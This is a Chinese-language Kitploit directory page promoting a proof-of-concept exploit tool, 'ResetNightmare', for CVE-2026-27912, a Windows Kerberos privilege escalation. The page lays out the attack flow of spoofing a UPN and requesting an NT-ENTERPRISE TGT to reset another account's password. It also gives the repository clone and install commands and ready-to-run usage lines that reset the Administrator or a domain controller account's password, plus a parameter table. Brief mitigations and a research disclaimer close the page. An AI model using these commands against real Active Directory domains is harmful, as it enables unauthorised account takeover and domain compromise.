Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Kerberos-CVE-2026-27912 — 针对 CVE-2026-27912 的 PoC - Windows Kerberos 权限提升 (ResetNightmare)。通过 Kerberos 漏洞进行未授权密码重置。仅供安全研究使用。 | Kitploit
工具/GitHubGitHub/oxstussz-eng/kerberos-cve-2026-27912
身份验证与授权权限提升密码攻击漏洞利用渗透测试
GitHuboxstussz-eng/kerberos-cve-2026-27912

Kerberos-CVE-2026-27912

针对 CVE-2026-27912 的 PoC - Windows Kerberos 权限提升 (ResetNightmare)。通过 Kerberos 漏洞进行未授权密码重置。仅供安全研究使用。

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
41128天前尚未审核

Kerberos-CVE-2026-27912

CVE-2026-27912 - Windows Kerberos 权限提升漏洞

ResetNightmare - 通过 Kerberos 更改密码协议缺陷实现未授权密码重置


📋 详情

字段值
CVECVE-2026-27912
标题Windows Kerberos 权限提升漏洞
CVSS8.0 HIGH (CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
CWECWE-285:授权不当
发布日期2026年4月14日
已修补2026年4月

🔍 攻击流程

root@kitploit:~
1. Attacker has/creates account with UPN write permissions
2. Sets fake UPN to target's sAMAccountName
3. Requests TGT with NT-ENTERPRISE name type
4. Clears their own UPN
5. Uses TGT to reset target's password
6. Verifies password change success

📦 要求

  • 带有 PowerShell 的 Windows
  • ActiveDirectory 模块(Install-WindowsFeature RSAT-AD-PowerShell)
  • Rubeus.exe(从 GhostPack/Rubeus 下载)
  • 可访问域控制器的网络

🚀 安装

root@kitploit:~
# Clone repository
git clone https://github.com/oxstussz-eng/Kerberos-CVE-2026-27912.git
cd Kerberos-CVE-2026-27912

# Install dependencies
pip install -r requirements.txt

💻 使用

基本攻击

root@kitploit:~
python resetnightmare.py -t Administrator -p NewPass123 -u AttackUser -up AttackPass

目标计算机账户

root@kitploit:~
python resetnightmare.py -t DC01$ -p NewPass123 -u AttackUser -up AttackPass -c

创建新账户

root@kitploit:~
python resetnightmare.py -t Admin -p NewPass -u NewUser -up Pass -path "OU=Temp,DC=domain,DC=local"

详细输出模式

root@kitploit:~
python resetnightmare.py -t Administrator -p NewPass123 -u AttackUser -up AttackPass -v

📊 参数


🛡️ 缓解措施

  1. 应用来自 Microsoft 安全更新的官方补丁
  2. 进行网络分段,限制邻近网络访问
  3. 实施最小权限原则 - 限制 UPN 写入权限
  4. 监控可疑的 UPN 更改和密码重置

⚠️ 免责声明

仅供授权的安全测试和教育研究使用。

未经授权访问计算机系统属于违法行为。作者不对本软件的滥用承担任何责任。


📚 参考资料

  • NVD:CVE-2026-27912
  • Microsoft 安全更新指南

👨‍💻 作者

n0vax1337 / 安全研究员


📄 许可证

MIT 许可证 - 请参阅 LICENSE


最后更新: 2026

下载工具
参数描述默认值
-t / --target目标账户名称必填
-p / --new-password目标账户的新密码必填
-u / --upn-user用于设置伪造 UPN 的账户必填
-up / --upn-passwordUPN 账户的密码必填
-c / --computerUPNUser 是计算机账户标志
-r / --rubeus-pathRubeus.exe 的路径Rubeus.exe
-e / --encryption支持的加密类型AES256
-path / --create-path创建新账户的 OU 路径""
-d / --dc域控制器名称自动检测
-v / --verbose详细输出标志